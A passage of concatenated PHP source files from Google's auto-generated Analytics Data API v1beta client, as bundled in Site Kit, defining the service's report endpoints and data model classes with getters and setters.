report data in Google Analytics. Warning: Creating multiple Customer * Applications, Accounts, or Projects to simulate or act as a single Customer * Application, Account, or Project (respectively) or to circumvent Service- * specific usage limits or quotas is a direct violation of Google Cloud * Platform Terms of Service as well as Google APIs Terms of Service. These * actions can result in immediate termination of your GCP project(s) without * any warning.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/analytics/devguides/reporting/data/v1/" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class AnalyticsData extends \Google\Site_Kit_Dependencies\Google\Service { /** View and manage your Google Analytics data. */ const ANALYTICS = "https://www.googleapis.com/auth/analytics"; /** See and download your Google Analytics data. */ const ANALYTICS_READONLY = "https://www.googleapis.com/auth/analytics.readonly"; public $properties; public $properties_audienceExports; public $rootUrlTemplate; /** * Constructs the internal representation of the AnalyticsData service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://analyticsdata.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://analyticsdata.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1beta'; $this->serviceName = 'analyticsdata'; $this->properties = new \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource\Properties($this, $this->serviceName, 'properties', ['methods' => ['batchRunPivotReports' => ['path' => 'v1beta/{+property}:batchRunPivotReports', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'batchRunReports' => ['path' => 'v1beta/{+property}:batchRunReports', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'checkCompatibility' => ['path' => 'v1beta/{+property}:checkCompatibility', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'getMetadata' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'runPivotReport' => ['path' => 'v1beta/{+property}:runPivotReport', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'runRealtimeReport' => ['path' => 'v1beta/{+property}:runRealtimeReport', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'runReport' => ['path' => 'v1beta/{+property}:runReport', 'httpMethod' => 'POST', 'parameters' => ['property' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->properties_audienceExports = new \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Resource\PropertiesAudienceExports($this, $this->serviceName, 'audienceExports', ['methods' => ['create' => ['path' => 'v1beta/{+parent}/audienceExports', 'httpMethod' => 'POST', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'v1beta/{+name}', 'httpMethod' => 'GET', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'v1beta/{+parent}/audienceExports', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]], 'query' => ['path' => 'v1beta/{+name}:query', 'httpMethod' => 'POST', 'parameters' => ['name' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class BatchRunPivotReportsRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'requests'; protected $requestsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunPivotReportRequest::class; protected $requestsDataType = 'array'; /** * @param RunPivotReportRequest[] */ public function setRequests($requests) { $this->requests = $requests; } /** * @return RunPivotReportRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\BatchRunPivotReportsRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_BatchRunPivotReportsRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Cohort extends \Google\Site_Kit_Dependencies\Google\Model { protected $dateRangeType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DateRange::class; protected $dateRangeDataType = ''; /** * @var string */ public $dimension; /** * @var string */ public $name; /** * @param DateRange */ public function setDateRange(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DateRange $dateRange) { $this->dateRange = $dateRange; } /** * @return DateRange */ public function getDateRange() { return $this->dateRange; } /** * @param string */ public function setDimension($dimension) { $this->dimension = $dimension; } /** * @return string */ public function getDimension() { return $this->dimension; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Cohort::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Cohort'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class InListFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'values'; /** * @var bool */ public $caseSensitive; /** * @var string[] */ public $values; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\InListFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_InListFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Pivot extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'orderBys'; /** * @var string[] */ public $fieldNames; /** * @var string */ public $limit; /** * @var string[] */ public $metricAggregations; /** * @var string */ public $offset; protected $orderBysType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\OrderBy::class; protected $orderBysDataType = 'array'; /** * @param string[] */ public function setFieldNames($fieldNames) { $this->fieldNames = $fieldNames; } /** * @return string[] */ public function getFieldNames() { return $this->fieldNames; } /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string[] */ public function setMetricAggregations($metricAggregations) { $this->metricAggregations = $metricAggregations; } /** * @return string[] */ public function getMetricAggregations() { return $this->metricAggregations; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } /** * @param OrderBy[] */ public function setOrderBys($orderBys) { $this->orderBys = $orderBys; } /** * @return OrderBy[] */ public function getOrderBys() { return $this->orderBys; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Pivot::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_Pivot'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class DimensionMetadata extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'deprecatedApiNames'; /** * @var string */ public $apiName; /** * @var string */ public $category; /** * @var bool */ public $customDefinition; /** * @var string[] */ public $deprecatedApiNames; /** * @var string */ public $description; /** * @var string */ public $uiName; /** * @param string */ public function setApiName($apiName) { $this->apiName = $apiName; } /** * @return string */ public function getApiName() { return $this->apiName; } /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param bool */ public function setCustomDefinition($customDefinition) { $this->customDefinition = $customDefinition; } /** * @return bool */ public function getCustomDefinition() { return $this->customDefinition; } /** * @param string[] */ public function setDeprecatedApiNames($deprecatedApiNames) { $this->deprecatedApiNames = $deprecatedApiNames; } /** * @return string[] */ public function getDeprecatedApiNames() { return $this->deprecatedApiNames; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setUiName($uiName) { $this->uiName = $uiName; } /** * @return string */ public function getUiName() { return $this->uiName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_DimensionMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class QueryAudienceExportRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $limit; /** * @var string */ public $offset; /** * @param string */ public function setLimit($limit) { $this->limit = $limit; } /** * @return string */ public function getLimit() { return $this->limit; } /** * @param string */ public function setOffset($offset) { $this->offset = $offset; } /** * @return string */ public function getOffset() { return $this->offset; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QueryAudienceExportRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_QueryAudienceExportRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class RunRealtimeReportResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'totals'; protected $dimensionHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionHeader::class; protected $dimensionHeadersDataType = 'array'; /** * @var string */ public $kind; protected $maximumsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $maximumsDataType = 'array'; protected $metricHeadersType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricHeader::class; protected $metricHeadersDataType = 'array'; protected $minimumsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $minimumsDataType = 'array'; protected $propertyQuotaType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota::class; protected $propertyQuotaDataType = ''; /** * @var int */ public $rowCount; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $rowsDataType = 'array'; protected $totalsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Row::class; protected $totalsDataType = 'array'; /** * @param DimensionHeader[] */ public function setDimensionHeaders($dimensionHeaders) { $this->dimensionHeaders = $dimensionHeaders; } /** * @return DimensionHeader[] */ public function getDimensionHeaders() { return $this->dimensionHeaders; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Row[] */ public function setMaximums($maximums) { $this->maximums = $maximums; } /** * @return Row[] */ public function getMaximums() { return $this->maximums; } /** * @param MetricHeader[] */ public function setMetricHeaders($metricHeaders) { $this->metricHeaders = $metricHeaders; } /** * @return MetricHeader[] */ public function getMetricHeaders() { return $this->metricHeaders; } /** * @param Row[] */ public function setMinimums($minimums) { $this->minimums = $minimums; } /** * @return Row[] */ public function getMinimums() { return $this->minimums; } /** * @param PropertyQuota */ public function setPropertyQuota(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PropertyQuota $propertyQuota) { $this->propertyQuota = $propertyQuota; } /** * @return PropertyQuota */ public function getPropertyQuota() { return $this->propertyQuota; } /** * @param int */ public function setRowCount($rowCount) { $this->rowCount = $rowCount; } /** * @return int */ public function getRowCount() { return $this->rowCount; } /** * @param Row[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return Row[] */ public function getRows() { return $this->rows; } /** * @param Row[] */ public function setTotals($totals) { $this->totals = $totals; } /** * @return Row[] */ public function getTotals() { return $this->totals; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\RunRealtimeReportResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_RunRealtimeReportResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class ListAudienceExportsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'audienceExports'; protected $audienceExportsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\AudienceExport::class; protected $audienceExportsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param AudienceExport[] */ public function setAudienceExports($audienceExports) { $this->audienceExports = $audienceExports; } /** * @return AudienceExport[] */ public function getAudienceExports() { return $this->audienceExports; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ListAudienceExportsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_ListAudienceExportsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class ResponseMetaData extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'samplingMetadatas'; /** * @var string */ public $currencyCode; /** * @var bool */ public $dataLossFromOtherRow; /** * @var string */ public $emptyReason; protected $samplingMetadatasType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\SamplingMetadata::class; protected $samplingMetadatasDataType = 'array'; protected $schemaRestrictionResponseType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\SchemaRestrictionResponse::class; protected $schemaRestrictionResponseDataType = ''; /** * @var bool */ public $subjectToThresholding; /** * @var string */ public $timeZone; /** * @param string */ public function setCurrencyCode($currencyCode) { $this->currencyCode = $currencyCode; } /** * @return string */ public function getCurrencyCode() { return $this->currencyCode; } /** * @param bool */ public function setDataLossFromOtherRow($dataLossFromOtherRow) { $this->dataLossFromOtherRow = $dataLossFromOtherRow; } /** * @return bool */ public function getDataLossFromOtherRow() { return $this->dataLossFromOtherRow; } /** * @param string */ public function setEmptyReason($emptyReason) { $this->emptyReason = $emptyReason; } /** * @return string */ public function getEmptyReason() { return $this->emptyReason; } /** * @param SamplingMetadata[] */ public function setSamplingMetadatas($samplingMetadatas) { $this->samplingMetadatas = $samplingMetadatas; } /** * @return SamplingMetadata[] */ public function getSamplingMetadatas() { return $this->samplingMetadatas; } /** * @param SchemaRestrictionResponse */ public function setSchemaRestrictionResponse(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\SchemaRestrictionResponse $schemaRestrictionResponse) { $this->schemaRestrictionResponse = $schemaRestrictionResponse; } /** * @return SchemaRestrictionResponse */ public function getSchemaRestrictionResponse() { return $this->schemaRestrictionResponse; } /** * @param bool */ public function setSubjectToThresholding($subjectToThresholding) { $this->subjectToThresholding = $subjectToThresholding; } /** * @return bool */ public function getSubjectToThresholding() { return $this->subjectToThresholding; } /** * @param string */ public function setTimeZone($timeZone) { $this->timeZone = $timeZone; } /** * @return string */ public function getTimeZone() { return $this->timeZone; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\ResponseMetaData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_ResponseMetaData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class OrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $desc; protected $dimensionType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionOrderBy::class; protected $dimensionDataType = ''; protected $metricType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricOrderBy::class; protected $metricDataType = ''; protected $pivotType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotOrderBy::class; protected $pivotDataType = ''; /** * @param bool */ public function setDesc($desc) { $this->desc = $desc; } /** * @return bool */ public function getDesc() { return $this->desc; } /** * @param DimensionOrderBy */ public function setDimension(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionOrderBy $dimension) { $this->dimension = $dimension; } /** * @return DimensionOrderBy */ public function getDimension() { return $this->dimension; } /** * @param MetricOrderBy */ public function setMetric(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricOrderBy $metric) { $this->metric = $metric; } /** * @return MetricOrderBy */ public function getMetric() { return $this->metric; } /** * @param PivotOrderBy */ public function setPivot(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotOrderBy $pivot) { $this->pivot = $pivot; } /** * @return PivotOrderBy */ public function getPivot() { return $this->pivot; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\OrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_OrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class QuotaStatus extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $consumed; /** * @var int */ public $remaining; /** * @param int */ public function setConsumed($consumed) { $this->consumed = $consumed; } /** * @return int */ public function getConsumed() { return $this->consumed; } /** * @param int */ public function setRemaining($remaining) { $this->remaining = $remaining; } /** * @return int */ public function getRemaining() { return $this->remaining; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\QuotaStatus::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_QuotaStatus'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MetricOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $metricName; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MetricOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class PivotOrderBy extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'pivotSelections'; /** * @var string */ public $metricName; protected $pivotSelectionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotSelection::class; protected $pivotSelectionsDataType = 'array'; /** * @param string */ public function setMetricName($metricName) { $this->metricName = $metricName; } /** * @return string */ public function getMetricName() { return $this->metricName; } /** * @param PivotSelection[] */ public function setPivotSelections($pivotSelections) { $this->pivotSelections = $pivotSelections; } /** * @return PivotSelection[] */ public function getPivotSelections() { return $this->pivotSelections; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\PivotOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_PivotOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class MetricMetadata extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'deprecatedApiNames'; /** * @var string */ public $apiName; /** * @var string[] */ public $blockedReasons; /** * @var string */ public $category; /** * @var bool */ public $customDefinition; /** * @var string[] */ public $deprecatedApiNames; /** * @var string */ public $description; /** * @var string */ public $expression; /** * @var string */ public $type; /** * @var string */ public $uiName; /** * @param string */ public function setApiName($apiName) { $this->apiName = $apiName; } /** * @return string */ public function getApiName() { return $this->apiName; } /** * @param string[] */ public function setBlockedReasons($blockedReasons) { $this->blockedReasons = $blockedReasons; } /** * @return string[] */ public function getBlockedReasons() { return $this->blockedReasons; } /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param bool */ public function setCustomDefinition($customDefinition) { $this->customDefinition = $customDefinition; } /** * @return bool */ public function getCustomDefinition() { return $this->customDefinition; } /** * @param string[] */ public function setDeprecatedApiNames($deprecatedApiNames) { $this->deprecatedApiNames = $deprecatedApiNames; } /** * @return string[] */ public function getDeprecatedApiNames() { return $this->deprecatedApiNames; } /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUiName($uiName) { $this->uiName = $uiName; } /** * @return string */ public function getUiName() { return $this->uiName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\MetricMetadata::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_MetricMetadata'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class CheckCompatibilityRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'metrics'; /** * @var string */ public $compatibilityFilter; protected $dimensionFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $dimensionFilterDataType = ''; protected $dimensionsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Dimension::class; protected $dimensionsDataType = 'array'; protected $metricFilterType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression::class; protected $metricFilterDataType = ''; protected $metricsType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\Metric::class; protected $metricsDataType = 'array'; /** * @param string */ public function setCompatibilityFilter($compatibilityFilter) { $this->compatibilityFilter = $compatibilityFilter; } /** * @return string */ public function getCompatibilityFilter() { return $this->compatibilityFilter; } /** * @param FilterExpression */ public function setDimensionFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $dimensionFilter) { $this->dimensionFilter = $dimensionFilter; } /** * @return FilterExpression */ public function getDimensionFilter() { return $this->dimensionFilter; } /** * @param Dimension[] */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return Dimension[] */ public function getDimensions() { return $this->dimensions; } /** * @param FilterExpression */ public function setMetricFilter(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\FilterExpression $metricFilter) { $this->metricFilter = $metricFilter; } /** * @return FilterExpression */ public function getMetricFilter() { return $this->metricFilter; } /** * @param Metric[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return Metric[] */ public function getMetrics() { return $this->metrics; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\CheckCompatibilityRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_AnalyticsData_CheckCompatibilityRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\AnalyticsData; class Dimension extends \Google\Site_Kit_Dependencies\Google\Model { protected $dimensionExpressionType = \Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionExpression::class; protected $dimensionExpressionDataType = ''; /** * @var string */ public $name; /** * @param DimensionExpression */ public function setDimensionExpression(\Google\Site_Kit_Dependencies\Google\Service\AnalyticsData\DimensionExpression $dimensionExpression) { $this->dimensionExpression = $dimensionExpression; } 